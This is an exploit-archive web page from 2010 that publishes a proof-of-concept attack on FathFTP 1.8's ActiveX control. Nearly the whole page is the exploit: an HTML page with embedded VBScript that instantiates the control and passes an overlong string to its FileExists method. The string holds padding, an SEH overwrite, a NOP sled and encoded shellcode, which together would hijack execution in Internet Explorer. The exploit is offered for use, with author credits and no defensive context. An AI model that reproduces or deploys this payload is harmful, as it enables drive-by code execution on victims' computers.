Home / os / win7

FathFTP 1.8 (FileExists Method) ActiveX Buffer Overflow (SEH

Posted on 04 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>FathFTP 1.8 (FileExists Method) ActiveX Buffer Overflow (SEH)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================= FathFTP 1.8 (FileExists Method) ActiveX Buffer Overflow (SEH) ============================================================= &lt;html&gt; &lt;object classid='clsid:62A989CE-D39A-11D5-86F0-B9C370762176' id='target'&gt;&lt;/object&gt; &lt;script language='vbscript'&gt; ' Exploit Title: FathFTP 1.8 (SEH) FileExists ActiveX Buffer Overflow ' Author: H4kr3m ' Greetz : MadjiX (best overflower ^^), His0k4 , Halimz Monster Dz , The Goblin , Ziko , Master_FIna ' Founded by : Blake - (version 1.8 : MadjiX) ' Tested on: Windows XP SP3 FR / IE6 shellcode = unescape(&quot;%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49&quot;) &amp; _ unescape(&quot;%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68&quot;) &amp; _ unescape(&quot;%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42&quot;) &amp; _ unescape(&quot;%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a&quot;) &amp; _ unescape(&quot;%48%50%44%63%30%35%50%43%30%4c%4b%57%35%77%4c%4c&quot;) &amp; _ unescape(&quot;%4b%51%6c%35%55%64%38%77%71%6a%4f%4c%4b%62%6f%45&quot;) &amp; _ unescape(&quot;%48%4e%6b%31%4f%45%70%55%51%6a%4b%73%79%6e%6b%70&quot;) &amp; _ unescape(&quot;%34%6c%4b%46%61%7a%4e%70%31%4b%70%4e%79%6e%4c%6c&quot;) &amp; _ unescape(&quot;%44%49%50%52%54%67%77%5a%61%59%5a%34%4d%55%51%6f&quot;) &amp; _ unescape(&quot;%32%4a%4b%79%64%37%4b%51%44%41%34%35%54%71%65%6d&quot;) &amp; _ unescape(&quot;%35%4e%6b%53%6f%47%54%65%51%4a%4b%31%76%4e%6b%46&quot;) &amp; _ unescape(&quot;%6c%30%4b%6e%6b%51%4f%75%4c%54%41%58%6b%4c%4b%77&quot;) &amp; _ unescape(&quot;%6c%6e%6b%66%61%58%6b%6d%59%33%6c%46%44%46%64%6a&quot;) &amp; _ unescape(&quot;%63%35%61%6b%70%71%74%6e%6b%63%70%54%70%6f%75%6f&quot;) &amp; _ unescape(&quot;%30%54%38%56%6c%4c%4b%61%50%36%6c%4e%6b%34%30%35&quot;) &amp; _ unescape(&quot;%4c%4c%6d%6e%6b%43%58%75%58%58%6b%54%49%4c%4b%4d&quot;) &amp; _ unescape(&quot;%50%6c%70%43%30%57%70%55%50%6e%6b%32%48%35%6c%71&quot;) &amp; _ unescape(&quot;%4f%67%41%6b%46%53%50%56%36%6b%39%48%78%4d%53%4f&quot;) &amp; _ unescape(&quot;%30%71%6b%32%70%33%58%4c%30%4d%5a%56%64%43%6f%52&quot;) &amp; _ unescape(&quot;%48%6a%38%4b%4e%4c%4a%66%6e%31%47%4b%4f%6b%57%61&quot;) &amp; _ unescape(&quot;%73%70%61%30%6c%71%73%64%6e%70%65%73%48%72%45%35&quot;) &amp; _ unescape(&quot;%50%68&quot;) nops = string(12, unescape(&quot;%90&quot;)) buff=String(1503, &quot;A&quot;) nseh=unescape(&quot;%eb%06%90%90&quot;) seh=unescape(&quot;%54%7A%01%10&quot;) buff2=String(8888, &quot;C&quot;) exploit = buff + nseh + seh + nops + shellcode + buff2 target.FileExists exploit &lt;/script&gt; &lt;/html&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-04]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP